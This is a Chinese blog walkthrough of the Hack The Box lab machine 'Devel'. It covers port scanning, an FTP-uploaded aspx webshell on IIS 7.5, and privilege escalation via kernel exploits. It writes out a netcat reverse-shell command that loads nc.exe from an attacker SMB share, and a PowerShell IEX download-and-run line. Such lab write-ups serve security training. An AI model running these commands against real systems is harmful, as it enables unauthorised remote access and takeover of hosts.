HTB Windows Devel

Posted on | In
Words count in article: 877 | Reading time ≈ 4

简介
1.ftp文件上传配合IIS 7.5构造命令执行漏洞;
2.smb远程加载nc获取反弹shell;
3.systeminfo查看系统信息,Sherlock、watson查找n day;
4.windows-kernel-exploits获取exp执行提权;

文章目录

  • 信息收集
  • webshell
  • priv: system

信息收集

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# Nmap 7.70 scan initiated Sat Dec  7 17:26:30 2019 as: nmap -sC -sV -p21,80 -oA nmap/Devel-vuln 10.10.10.5
Nmap scan report for localhost (10.10.10.5)
Host is up (0.30s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec  7 17:26:43 2019 -- 1 IP address (1 host up) scanned in 13.31 seconds

21端口,ftp服务,版本:Microsoft ftpd,存在匿名访问且ftp目录中含有iisstart.htm、welcome.png等文件,这几个文件一般出现的IIS 7.5的默认WEB访问路径中,可以考虑文件上传写webshell.
80端口,http服务,版本:Microsoft IIS httpd 7.5,操作系统版本可能是Windows 7Windows Server 2008 R2
iis各版本对应操作系统版本

历史漏洞搜索

1. Microsoft ftpd
未找到历史漏洞;

2. Microosoft IIS 7.5

1
2
3
4
5
6
7
8
9
10
$ searchsploit iis 7.5
-------------------------------------------------------------------------------------- ------------------------------------------------------------
 Exploit Title                                                                        |  Path
                                                                                      | (/usr/local/opt/exploitdb/share/exploitdb/)
-------------------------------------------------------------------------------------- ------------------------------------------------------------
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities                              | exploits/windows/remote/19033.txt
Microsoft IIS 7.5 (Windows 7) - FTPSVC Unauthorized Remote Denial of Service (PoC)    | exploits/windows/dos/15803.py
-------------------------------------------------------------------------------------- ------------------------------------------------------------
Shellcodes: No Result
Papers: No Result

其中,15803为拒绝服务漏洞不用管,接下来先看一下19033,19033中包含两个IIS 7.5的漏洞,均是绕过ASP文件访问限制的,那么前提是有ASP文件,后续可以目录枚举。

3. ftp匿名访问
尝试匿名访问ftp服务,有上传下载的权限,且通过http服务可以访问上传的文件,可解析aspx文件。

webshell -> reverse shell

复制、修改并上传SecLists字典里的cmd.aspx文件到ftp目录下,然后访问即可执行操作系统命令,然后发现还不是SYSTEM权限,开始准备提权。

获取目标系统的shell方便后续提权,获取Windows机器shell的方法见:How to get reverse shell in Windows;这里使用smb共享远程加载nc获取反弹shell:

1
2
3
4
5
6
7
8
9
10
11
# kali开启端口监听,mac下nc监听无法用lvvp参数,一般lv代替
$ nc -lvvp 4444

# kali开启smbserver服务并设定好共享的路径
$ smbserver.py owef /tmp

# 复制nc.exe到/tmp目录中
$ cp / /tmp/

# 通过webshell执行命令获取反弹shell
$ \\10.10.14.39\owef\nc.exe -e cmd.exe 10.10.14.39 4444

priv: SYSTEM

内部信息收集

1.systeminfo命令查看系统的基本配置信息;

2.reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"查看.NET Framework的版本;

3.使用第三方工具(Waston、Sherlock)搜集系统中可能存在的漏洞;
tips://Waston需要根据目标系统的.net版本进行编译,可以优先使用PowerShell脚本Sherlock进行信息枚举;

1
2
# 执行Sherlock,由于可以ftp匿名上传,因此可以选择将exp通过ftp上传,然后执行;这里使用powershell直接加载,不落盘
$ powershell -exec Bypass -C "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.39/Sherlock.ps1');Find-AllVulns"

通过Sherlock找到:MS15-051、MS10-092、MS10-015;
通过waston找到额外的MS11-046;
利用windows-kernel-exploits找到漏洞对应的exp,执行提权获取user和root的flag.

owefsad wechat
进击的DevSecOps,持续分享SAST/IAST/RASP的技术原理及甲方落地实践。如果你对 SAST、IAST、RASP方向感兴趣,可以扫描下方二维码关注公众号,获得更及时的内容推送。
0%